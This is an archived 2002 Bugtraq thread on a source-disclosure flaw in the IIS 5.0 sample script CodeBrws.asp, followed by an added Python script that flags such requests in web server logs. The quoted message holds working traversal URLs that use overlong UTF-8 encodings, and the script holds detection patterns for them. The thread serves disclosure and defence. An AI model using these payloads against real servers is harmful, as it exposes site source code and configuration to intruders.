Bugtraq mailing list archives
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
From: H D Moore <hdm () digitaloffense net>
Date: Wed, 17 Apr 2002 07:27:56 -0500
Right, you can only access files ending in the four "allowed" extensions. These extensions are: .asp, .inc, .htm, and .html.

-HD

On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote:
> While checking various files and extensions I wanted to ensure that other files were still "protected" from this. I was not able to read the global.asa but was able to read (as expected) other asp pages.
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa
> Returned "View Active Server Page Source-- Access Denied" to the browser.
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp
> Returned the source code to the browser.
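For log review, the requests quoted in this thread can be recognised by the overlong UTF-8 encoding of "." (`%c0%ae`) in the `Source` parameter of CodeBrws.asp. The following Python is an added example, not part of the original posts: the log field order, timestamps and client addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_to_bytes

# Extensions the thread says CodeBrws.asp will display.
VIEWABLE = (".asp", ".inc", ".htm", ".html")
# 0xC0/0xC1 lead bytes are never valid UTF-8: they only occur in overlong
# two-byte encodings of ASCII, e.g. C0 AE for "." (0x2E).
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

# Constructed sample lines; assumed fields: date time c-ip method uri-stem uri-query
SAMPLE_LOG = [
    "2002-04-17 12:25:01 192.0.2.5 GET //iissamples/sdk/asp/docs/CodeBrws.asp Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa",
    "2002-04-17 12:25:09 192.0.2.5 GET //iissamples/sdk/asp/docs/CodeBrws.asp Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp",
    "2002-04-17 12:26:02 192.0.2.7 GET /iissamples/sdk/asp/docs/CodeBrws.asp Source=/IISSAMPLES/sdk/asp/docs/CodeBrws.asp",
    "2002-04-17 12:26:10 192.0.2.7 GET /default.asp -",
]

def fold_overlong(raw: bytes) -> bytes:
    """Map each overlong pair to the ASCII byte a lenient decoder would yield."""
    return OVERLONG.sub(
        lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), raw)

def inspect_line(line: str):
    """Return a finding dict for a CodeBrws.asp request, else None."""
    fields = line.split()
    if len(fields) < 6 or not fields[4].lower().endswith("/codebrws.asp"):
        return None
    params = dict(p.split("=", 1) for p in fields[5].split("&") if "=" in p)
    source = next((v for k, v in params.items() if k.lower() == "source"), None)
    if source is None:
        return None
    raw = unquote_to_bytes(source)  # keep raw bytes; do not decode as UTF-8 yet
    path = fold_overlong(raw).decode("latin-1").replace("\\", "/")
    return {
        "client": fields[2],
        "path": path,
        "overlong": bool(OVERLONG.search(raw)),
        "traversal": ".." in path.split("/"),
        "viewable_ext": path.lower().endswith(VIEWABLE),
    }

def findings(lines):
    """Keep only requests that use an overlong encoding or a '..' segment."""
    return [f for f in map(inspect_line, lines) if f and (f["overlong"] or f["traversal"])]

if __name__ == "__main__":
    for f in findings(SAMPLE_LOG):
        print(f)
```

The `viewable_ext` flag separates requests the script would answer with source (per the extension list above) from those it refuses, which helps triage which hits actually disclosed content.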